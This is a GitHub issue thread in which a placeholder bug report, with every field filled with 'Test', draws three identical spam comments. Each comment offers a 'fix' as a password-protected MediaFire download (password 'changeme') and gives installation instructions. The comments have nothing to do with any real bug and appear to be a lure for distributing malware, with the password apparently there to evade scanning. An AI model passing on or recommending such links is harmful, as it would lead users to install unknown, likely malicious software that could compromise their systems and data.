### ISSUE TITLE
(BUG): Test

### ISSUE THREAD

**Issue by xCykrix** [xCykrix/.github#1]
### Report Context

TEst

### Installed Version

Test

### System Environment

Test

### Steps to Reproduce

Test
1.
2.
3.

### Error Message

Some Error

### Extra Information

All The Info

![image](https://github.com/user-attachments/assets/ff9fd3ec-d919-452d-a878-96d1459f8e62)

### Please affirm the following options.

- [X] I Agree to the [Code of Conduct](./CODE_OF_CONDUCT.md)
- [X] I Agree to the [Contributing Guidelines](./CONTRIBUTING.md)
- [x] I Agree to the [Security Reporting Guidelines](./SECURITY.md)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
